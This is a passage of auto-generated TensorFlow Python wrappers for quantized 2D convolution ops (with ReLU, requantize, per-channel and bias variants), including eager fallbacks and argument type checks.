_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DAndRelu", input=input, filter=filter,
min_input=min_input, max_input=max_input,
min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations,
padding_list=padding_list, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndReluOutput._make(_result)
return _result
QuantizedConv2DAndRelu = tf_export("raw_ops.QuantizedConv2DAndRelu")(_ops.to_raw_op(quantized_conv2d_and_relu))
def quantized_conv2d_and_relu_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_relu' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndReluOutput._make(_result)
return _result
_QuantizedConv2DAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DAndReluAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_and_relu_and_requantize(input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.quint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DAndReluAndRequantize", name, input, filter,
min_input, max_input, min_filter, max_filter, min_freezed_output,
max_freezed_output, "out_type", out_type, "strides", strides,
"padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _QuantizedConv2DAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_and_relu_and_requantize_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DAndReluAndRequantize", input=input, filter=filter,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DAndReluAndRequantize = tf_export("raw_ops.QuantizedConv2DAndReluAndRequantize")(_ops.to_raw_op(quantized_conv2d_and_relu_and_requantize))
def quantized_conv2d_and_relu_and_requantize_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DAndReluAndRequantize", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedConv2DAndRequantizeOutput = collections.namedtuple(
"QuantizedConv2DAndRequantize",
["output", "min_output", "max_output"])
def quantized_conv2d_and_requantize(input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type=_dtypes.qint8, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint8`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DAndRequantize", name, input, filter, min_input,
max_input, min_filter, max_filter, min_freezed_output,
max_freezed_output, "out_type", out_type, "strides", strides,
"padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _QuantizedConv2DAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_and_requantize_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DAndRequantize", input=input, filter=filter,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides, padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndRequantizeOutput._make(_result)
return _result
QuantizedConv2DAndRequantize = tf_export("raw_ops.QuantizedConv2DAndRequantize")(_ops.to_raw_op(quantized_conv2d_and_requantize))
def quantized_conv2d_and_requantize_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DAndRequantize", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DAndRequantizeOutput._make(_result)
return _result
_QuantizedConv2DPerChannelOutput = collections.namedtuple(
"QuantizedConv2DPerChannel",
["output", "min_output", "max_output"])
def quantized_conv2d_per_channel(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], name=None):
r"""Computes QuantizedConv2D per channel.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original input tensor.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
The original filter tensor.
min_input: A `Tensor` of type `float32`.
The minimum value of the input tensor
max_input: A `Tensor` of type `float32`.
The maximum value of the input tensor.
min_filter: A `Tensor` of type `float32`.
The minimum value of the filter tensor.
max_filter: A `Tensor` of type `float32`.
The maximum value of the filter tensor.
strides: A list of `ints`. list of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
The quantized type of output tensor that needs to be converted.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
list of dilation values.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DPerChannel", name, input, filter, min_input,
max_input, min_filter, max_filter, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations)
_result = _QuantizedConv2DPerChannelOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_per_channel_eager_fallback(
input, filter, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_per_channel' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_per_channel' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DPerChannel", input=input, filter=filter,
min_input=min_input, max_input=max_input,
min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DPerChannel", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DPerChannelOutput._make(_result)
return _result
QuantizedConv2DPerChannel = tf_export("raw_ops.QuantizedConv2DPerChannel")(_ops.to_raw_op(quantized_conv2d_per_channel))
def quantized_conv2d_per_channel_eager_fallback(input, filter, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_per_channel' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_per_channel' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations)
_result = _execute.execute(b"QuantizedConv2DPerChannel", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DPerChannel", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DPerChannelOutput._make(_result)
return _result
_QuantizedConv2DWithBiasOutput = collections.namedtuple(
"QuantizedConv2DWithBias",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor` of type `float32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBias", name, input, filter, bias, min_input,
max_input, min_filter, max_filter, "out_type", out_type, "strides",
strides, "padding", padding, "dilations", dilations, "padding_list",
padding_list)
_result = _QuantizedConv2DWithBiasOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedConv2DWithBias", input=input, filter=filter, bias=bias,
min_input=min_input, max_input=max_input,
min_filter=min_filter,
max_filter=max_filter, strides=strides,
padding=padding, out_type=out_type,
dilations=dilations,
padding_list=padding_list, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedConv2DWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasOutput._make(_result)
return _result
QuantizedConv2DWithBias = tf_export("raw_ops.QuantizedConv2DWithBias")(_ops.to_raw_op(quantized_conv2d_with_bias))
def quantized_conv2d_with_bias_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.qint32
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_conv2d_with_bias' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "out_type",
out_type, "strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _execute.execute(b"QuantizedConv2DWithBias", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedConv2DWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedConv2DWithBiasOutput._make(_result)
return _result
_QuantizedConv2DWithBiasAndReluOutput = collections.namedtuple(
"QuantizedConv2DWithBiasAndRelu",
["output", "min_output", "max_output"])
def quantized_conv2d_with_bias_and_relu(input, filter, bias, min_input, max_input, min_filter, max_filter, strides, padding, out_type=_dtypes.qint32, dilations=[1, 1, 1, 1], padding_list=[], name=None):
r"""TODO: add doc.
Args:
input: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
filter: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor` of type `float32`.
min_input: A `Tensor` of type `float32`.
max_input: A `Tensor` of type `float32`.
min_filter: A `Tensor` of type `float32`.
max_filter: A `Tensor` of type `float32`.
strides: A list of `ints`.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedConv2DWithBiasAndRelu", name, input, filter, bias,
min_input, max_input, min_filter, max_filter, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _QuantizedConv2DWithBiasAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_conv2d_with_bias_and_relu_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
out_type=out_type, strides=strides, padding=padding,
dilations=dilations, padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_conv2d_with_bias_and_relu' Op, not %r." % strides)
